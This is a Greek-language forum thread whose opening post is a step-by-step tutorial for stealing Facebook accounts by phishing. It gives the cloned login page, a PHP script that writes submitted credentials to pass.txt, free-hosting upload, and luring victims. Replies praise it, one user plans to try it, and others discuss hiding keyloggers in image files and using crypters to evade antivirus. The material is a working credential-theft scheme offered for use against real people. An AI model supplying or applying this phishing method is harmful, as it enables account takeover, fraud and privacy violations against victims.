Jump to content

[GR]Πως κλεβω FACEBOOK Λογαριασμους


Recommended Posts

Εισαγωγη

Γεια σας φιλοι.Στο σημερινο οδηγο θα σας δειξω πως εγω μπορω να κλεψω λογαριασμους facebook..Ειναι ενα θεμα το οποιο καιει πολλους ,και ετσι αποφασισα να το μοιραστω μαζι σας..Υπενθυμιζω οτι αυτος ειναι ενα απο τους πολλους τροπους να παρετε ενα λογαριασμο.

 

Μεθοδος

Η μεθοδος που θα χρησημοποιησουμε λεγεται phising (ψαρεμα δηλαδη).

To phising ειναι μια ψευτικη σελιδα, η οποια ειναι ακριβως ιδια με την αυθεντικη (του facebook στην δικη μας περιπτωση) με την διαφορα οτι ,οταν το θυμα βαλει τα στοιχεια του ,αυτα ερχοντε αυτοματα στον υπολογιστη μας!

Πως φτιαχνουμε αυτη τη σελιδα

Ειναι σχετικα ευκολο να δημιουργησεις μια τετοια σελιδα και το βολικο ειναι οτι μπορεις να το κανεις με οτιδηποτε λειτουργικο τρεχεις στον υπολογιστη σου! Ξεκιναμε:

1.Πηγαινουμε στη σελιδα που κανει login ο χρηστης του facebook (το θυμα δηλαδη) , παταμε δεξι κλικ και επιλεγουμε εκει που λεει View Page Source η αλλιως προβολη πηγαιου κωδικα.Μια επιλογη ακομα ειναι να πατησετε ctrl + u  και να σας τον εμφανισει κατευθειαν.

 

2.Κανουμε επιλογη ολου του κωδικα με ctrl + a και υστερα αντιγραφη και επικολληση σε ενα δικο μας σημειωματαριο.Αποθηκευουμε το αρχειο ως name.html

 

3.Aνοιγουμε για ακομη μια φορα ενα σημειωματαριο και γραφουμε τον παρακατω κωδικα ,μονο που στο Location βαζουμε το site που θελουμε , στην περιπτωση μας το facebook..

<?php
header ('Location: το site που θελετε να στειλετε το θυμα');
$handle = fopen("pass.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>

 

4.Το κανουμε αποθηκευση ως name.php (στο name βαζετε οτι θελετε..!)

 

5.Aνοιγουμε ξανα το σημειωματαριο και χωρις να γραψουμε τιποτα ,το αποθηκευουμε απλα ως pass.txt

 

6.Ανοιγουμε το πρωτο αρχειο που ειχαμε φτιαξει (τον κωδικα της σελιδας)

και παταμε ctrl + F και ψαχνουμε να βρουμε  για τη φραση που λεει

action="https://www.facebook.com/login.php?login_attempt=1"

 

7.Αντικαθιστουμε το λινκ με το ονομα του δευτερου αρχειου που ειχαμε φτιαξει  (το .php). Οποτε θα δειχνει καπως ετσι action="arxeiopouftia3ame.php" και το κανουμε αποθηκευση.

 

8.Αφου εχουμε φτιαξει ολα αυτα τα αρχεια ,θα πρεπει να τα ανεβασουμε σε ενα free hosting website (οπως το my3gb) εχοντας τα ολα στον ιδιο φακελο.

 

9.Τωρα το μονο που εχουμε να κανουμε ειναι να στειλουμε το θυμα στην σελιδα που εχουμε δημιουργησει ,και να περιμενουμε να πληκτρολογησει τα στοιχεια του..!Με το που τα βαλει ,αυτα αποθηκευονται στο αρχειο pass.txt  που εχουμε ανεβασει..

 

Αυτη ειναι ολη η διαδικασια!

Θα κλεισω λεγοντας πως

 

ΔΕΝ ΦΕΡΩ ΚΑΜΙΑ ΕΥΘΥΝΗ ΟΥΤΕ ΕΓΩ ΑΛΛΑ ΟΥΤΕ ΚΑΙ ΤΟ ΦΟΡΟΥΜ MAXCHEATERS ΓΙΑ ΤΙΣ ΠΡΑΞΕΙΣ ΣΑΣ!

 

Credits:Δικα μου.

Link to comment
Share on other sites

Ωραιο μου θυμιζει keylogger αλλα οταν λες να το ανεβασουμε εννοεις σαν www? Μου μυριζεται jail

 

Sent from my GT-S5360

Ναι..Για αυτο αναφερω οτι δεν φερω ευθυνες για οτι κανετε ουτε εγω αλλα ουτε και το φορουμ..Το θεμα ειναι οτι αν εισαι αρκετα εξυπνος και ξερεις να προστατευεσαι δεν θα παθεις τιποτα..
Link to comment
Share on other sites

Σιγουρα... αλλα αυτο μπορεις φυσικα κ λοκαλ αν μπει κανας φιλος σ απο τ pc σου

 

Sent from my GT-S5360

Αν ειναι να γινει local δεν χρειαζεται ολη αυτη η διαδικασια..Βαζεις ενα keylogger :) οπως ανεφερες πανω!
Link to comment
Share on other sites

Keylogger ομως γινεται να βαλεις και σε αρχειο .jpg ας πουμε και να αναγκασεις το θυμα να το κατεβαση

 

Sent from my GT-S5360

Link to comment
Share on other sites

Keylogger ομως γινεται να βαλεις και σε αρχειο .jpg ας πουμε και να αναγκασεις το θυμα να το κατεβαση

 

Sent from my GT-S5360

Nαι φυσικα!Απλα ειναι δυσκολοτερη διαδικασια ,καθως θα χρειαστεις crypter service ωστε να ανεβασεις το αρχειο σε μια σελιδα ,και οταν το κατεβασει καποιος να μην εντοπιστει σαν ιος ,και να το τρεξει κανονικα :)
Link to comment
Share on other sites

Telio guide imba share.

 

Analitikotato kai borw na po to pio oreo sou mexri tora.

 

+1

Σε ευχαριστω φιλε μου..Θα φτιαξω και αλλα καποια στιγμη :)
Link to comment
Share on other sites

τελειο Guide αδελφέ πιστευω να δουλέψει θα το δοκιμασω.

Δοκιμασε το και για τυχον αποριες ενημερωσε με!Σε ευχαριστω
Link to comment
Share on other sites

Το ιδιο μπορει να γινει και με mysql. Πολυ ωραιο guide απλα δεν το εξηγεις και παρα πολυ απλα.

 

Συνεχισε ετσι.

Link to comment
Share on other sites

Το ιδιο μπορει να γινει και με mysql. Πολυ ωραιο guide απλα δεν το εξηγεις και παρα πολυ απλα.

 

Συνεχισε ετσι.

Σε ευχαριστω..Θα μπορουσες να μου πεις καποιο σημειο οτι οποιο δεν το εξηγω αρκετα καλα ,για να το διορθωσω και να το κανω πιο κατανοητο ?
Link to comment
Share on other sites

Dika sou ta Credits?

hackhosting.com/showthread.php?tid=322

Ναι δικα μου! ο V1P einai filaraki! kai zhthse adeia na to kanei copy paste!des hmerominia pou egine to post..! mh mou pas kontra :P
Link to comment
Share on other sites

Αυτο που μου εστειλες εγινε ποστ πριν απο 2 ΜΕΡΕΣ!!Ποιος το εχει κανει Copy/Paste ε?

ΜΗΝ ΠΡΟΤΡΕΧΕΙ Η ΓΛΩΤΤΑ ΤΗΣ ΔΙΑΝΟΙΑΣ :)

Οριστε και το λινκ να το τσεκαρετε ολοι ..Επισης τα credits στο hackhosting σε εμενα ειναι...sexomaniakos συνελθε...

http://hackhosting.com/showthread.php?tid=322 ΔΕΙΤΕΕΕΕ

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...